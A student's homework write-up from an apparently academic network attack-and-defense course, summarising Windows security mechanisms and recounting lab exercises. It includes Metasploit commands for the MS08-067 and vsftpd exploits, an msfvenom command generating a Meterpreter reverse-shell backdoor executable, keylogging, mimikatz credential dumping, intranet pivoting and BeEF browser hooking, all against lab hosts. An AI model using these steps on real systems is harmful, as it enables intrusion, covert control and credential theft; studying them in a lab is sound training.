2016-2017-2 20179215 "Network Attack and Defense Practice" Week 7 Homework

Textbook learning content summary

Chapter 7. Windows OS Security Attacks and Defenses

Security Architecture and Mechanism of Windows Operating System

The Windows security architecture
implements a basic object security model based on the Reference Monitor model. The core is the SRM (Security Reference Monitor) security reference monitor located in the kernel, and the LSASS security service located in the user mode.
Windows authentication mechanisms
are divided into three categories: users, user groups, and computers. Each security principal is identified by a globally unique SID security identifier both in time and space.
Windows user passwords are encrypted and stored in the SAM or Active Directory AD. The local user account password information is encrypted with an irreversible 128-bit random key Hash and stored in the SAM file.
The Windows process, the GINA graphical login window, and the LSASS service cooperate to complete the local authentication process.
Windows authorization and access control mechanism
Windows authorization and access control mechanism is based on the reference monitor model, which is implemented by the SRM module in the kernel and the LSASS service in the user mode.
Windows abstracts all resources that need to be protected in the system into objects, and each object is associated with an SD Security Descriptor (Security Descriptor), which is associated with an object descriptor, consisting of the following attributes: Owner SID, Group SID, DACL autonomous Access Control List, SACL System Audit Access Control List.
Windows Security Audit Mechanism
The system audit policy is defined by the system administrator in the local security policy to determine which events the system records.
Other Windows Security Mechanisms
Windows Security Center integrates the three most critical security measures to protect the safe and stable operation of Windows systems: firewall, automatic patch update, and virus protection. In addition to Security Center, Windows' security features include IPSec encryption and authentication mechanisms, EFS encrypted file systems, Windows file protection mechanisms, and privacy protection and browsing security protection mechanisms provided by the bundled IE browser.

** Windows remote security attack and defense technology**

Windows remote attack techniques can be divided into: remote password guessing and cracking attacks, attacks on Windows network services, and attacks on Windows clients and users

Windows System Security Vulnerability Life Cycle
Windows Security Vulnerability Discovery, Exploitation and Patching Process
Security Vulnerability Public Disclosure Information Base: Several well-known general vulnerability information bases: CVE, NVD, SecurityFocus, OSVDB, etc.
Penetration testing attack process for a specific target:

①Vulnerability scanning test
②Find penetration code for discovered vulnerabilities
③Perform penetration test

Penetration Testing Using Metasploit Software
Metasploit is completely open source penetration testing software. Adopting an extensible model of development framework and modular components, the Metasploit Framework (MSF) library written in Ruby language serves as the basic core of the entire software, providing a platform for the development and testing of penetration testing components; the modular components are the code that actually implements penetration attacks.
Metasploit provides four different user interaction interfaces: CLI, Console, Web, and GUI, of which the Console terminal is the most commonly used method.

Windows Remote Password Guessing and Cracking Attacks

Remote password guessing

Remote Password Exchange Communication Eavesdropping and Cracking

Remote password guessing and cracking prevention measures
Windows Network Services Remote Penetration Attack

Windows operating systems open ports 135 (TCP), 137 (UDP), 139 (TCP) and 445 (TCP) by default, and the corresponding network services are MSRPC and procedure call services, NetBIOS network basic input output system services and SMB file and printer sharing Serve.

针对NetBIOS网络服务的著名漏洞及攻击

针对SMB网络服务的著名漏洞及攻击

针对MSRPC网络服务的著名漏洞及攻击

针对Windows系统上微软网络服务的远程渗透攻击

针对Windows系统上第三方网络服务的远程渗透攻击

网络服务远程渗透攻击防范措施

Class Test - Windows Attack

MS08-067 Vulnerability Introduction

The MS08-067 vulnerability, known as the Windows Server Service RPC Request Buffer Overflow Vulnerability, could allow remote code execution if a user receives a specially crafted RPC request on an affected system. On Microsoft Windows 2000, Windows XP and Windows Server 2003 systems, an attacker could exploit this vulnerability to run arbitrary code without authentication. This vulnerability can be used for worm attacks, and there are already worms that exploit this vulnerability.

The attack aircraft used in this experiment is kali, and the target aircraft is WinXP

Attacker: 192.168.14.136
Target: 192.168.14.131

1. To use metasploit in Kali, first start the PostgreSQL database service and the metasploit service

But kali 2.0 has no metasploit service, so the method of service metasploit start does not work.
The way to start MSF with database support in kali 2.0 is as follows:

First start the postgresql database: /etc/init.d/postgresql start; or service postgresql start
Initialize the MSF database (critical step!): msfdb init
Run msfconsole: msfconsole
View database connection status in msf: db_status

2. Find out whether there is a ms08-067 vulnerability, and see the corresponding information returned

3. Enter and use the exploit program: command: use exploit/windows/smb/ms08_067_netapi; after execution is as follows:

4. Set the address of the target and attack aircraft

set RHOST 192.168.14.131
set LHOST 192.168.14.136

5. The next step is to implement the attack, execute the command exploit

kali video learning

1. Retrieval and Exploitation of KaliSecurity Vulnerabilities

1. searchsploit can use keywords to search for vulnerability information and the exp corresponding to the vulnerability to
searchsploit wordpresslist the vulnerability and file address.

Check out the files listed, for example:

2. ikat automatically opens different exp. Waiting for the target to visit.

3. termineter aims to assess the security of smart meters

2. Metasploit basis for KaliSecurity exploits

Metasploit is often used in penetration testing. This software includes many tools that form a complete attack framework.

1. Start the service

To use Metasploit in Kali, you need to start the PostgreSQL database service and the metasploit service first, and then you can use the msf database to query exploits and records.

2. Path introduction

The path to msf in Kali is/usr/share/metasploit-framework

3. Basic commands

msfpayload: used to generate payload or shellcode. Searches can be used to msfpayload -l |gre "windows"query; the -o option can list the parameters required by the payload.
msfencode: The encoder in msf, which was used to bypass AV (antivirus software) in the early days, and is now commonly used to encode msfpayload with it to avoid bad strings of exploits.
msfconsole: Open the console of metasploit. Enter msfconsole to open msf

4. Test example: find vulnerabilities, search for exploitsnmap -sV 192.168.14.136

It can be seen that the ftp service is open on port 21. The version used is vsftpd 2.3.4. Is there any vulnerability in this version? Search for
vsftpd in msf

found a match

5. Test example: select exploit to view parameters

Check the parameters and find that the parameters of RHOST have not been set, and then set the parameters for itset RHOST 192.168.14.136

6. Test example: After selecting the payload and setting it up, show optionscheck the parameters and find that there are no parameters to set.

7. Execute the attack

Enter exploitthe attack test, if successful, it will return a shell:
at this time, you can view the id, ip address, and some file information, etc., and you can obtain the permissions of the target host.

3. Introduction to Meterpreter for KaliSecurity Vulnerability Exploitation

1. Generate the Meterpreter backdoor; open MSF, enable monitoring (select exploit/multi/handler); execute door.exe on the target machine;

msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.14.136 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe 
/* 查看自己的IP地址为192.168.14.136，LHOST、LPORT为reverse_tcp的参数，可以在msf里查看到（记得把服务启动）*/

It is found that it cannot be displayed after the setting is successful, because the msfpayload under the new version of kali has been removed. In the future, just use msfvenom, which integrates the functions of msfpayload and msfencode:

So the command to generate the meterpreter backdoor is equivalent to:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.14.136 LPORT=2333 -i 5 -f exe /root/door.exe

Generated successfully, move it into the XP system:

2. Open MSF and enable monitoring

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LPORT 2333

Modify the listening port:

3. Execute door.exe on the target host

Execute exploit in kali's msf to start listening:

4. View executable commands through the help command:

5. Common command usage

6. Capture the screen, you can see that the capture results are saved under root

7. Keyboard monitoring

开启服务：keyscan_dump
关闭服务:keyscan_stop

8. Extension tool: load

9. Load mimikatz of extension tools

Grab the local password plaintext:

Found one more mimikatz command:

To get credentials, enter the command: wdigest

4. Post-Metasploit Penetration Testing of KaliSecurity Vulnerability Exploitation

After the springboard obtains a certain authority, it needs to actively develop the authority of the intranet host, obtain the specified target information, and probe for system vulnerabilities. With the help of the Meterpreter backdoor that msf has obtained, the series of operations can be easier.

View the current network card and network segment information (using ifconfig). You can see three network cards, one is the local network card, the other is the network card we can access, and the other network card has an internal network IP (can not access, you can try ping below).
Adding routing tables run autoroute -s 10.0.0.1can use modules in msf to attack or scan across network segments. Quickly added via script autoroute.
Open socket proxy, create a socks proxy by using auxiliary/server/socks4a module, which can be used for browser, sqlmap, nmap. You can access intranet computers through a proxy.
You can freely switch to session through background and session -i.
Type run to see many commands that can be done on the meterpreter.
6. You can see the post penetration test module through run post/
Get intranet informationrun arp_scanner -r 10.0.0.1/24
You can also upload files, do port forwarding and perform subsequent tests, such as upload lcx.exe c:\\transferring files to the root directory of the c drive.

5. BeEF exploited by KaliSecurity

The use of XSS vulnerabilities requires a strong framework support. BeeF is the abbreviation of browser attack framework, which is an infiltration tool focused on the browser side.

1. Start BeeF from the command line

Just use the command beef-xss directly, open the browser, it will automatically jump to the beef login page:

默认用户名：beef
密码：beef

You can enter the main interface:

2. Assume that the host under test requests to

Test utilization: Enter the URL http://127.0.0.1:3000/demos/basic.html to enter a test page:

In this way, you can see an online host at the left end of the main interface:

3. The duration of HOOK is until the test page is closed. During this period, it is equivalent to being controlled. Attack commands can be sent. In the Commands module, we can complete many tasks.

in. 4 colors represent:

该攻击模块可用，且隐蔽性强

该攻击模块可用，但隐蔽性差

该用户模块是否可用还有待验证

该攻击模块不可用

4. Select the Raw JavaScript module under MISC as the test case

There is a table with a detailed description of the module, as well as some optional parameters. Click Execute to attack:

5.Proxy function

Select the target host, right-click, select use as proxy in the menu, and then edit and send the content you want to send in the forge request in the rider tab:

After the information is sent, you can see it through the History option. After the transmission is successful, click the corresponding information to display the detailed transmission process: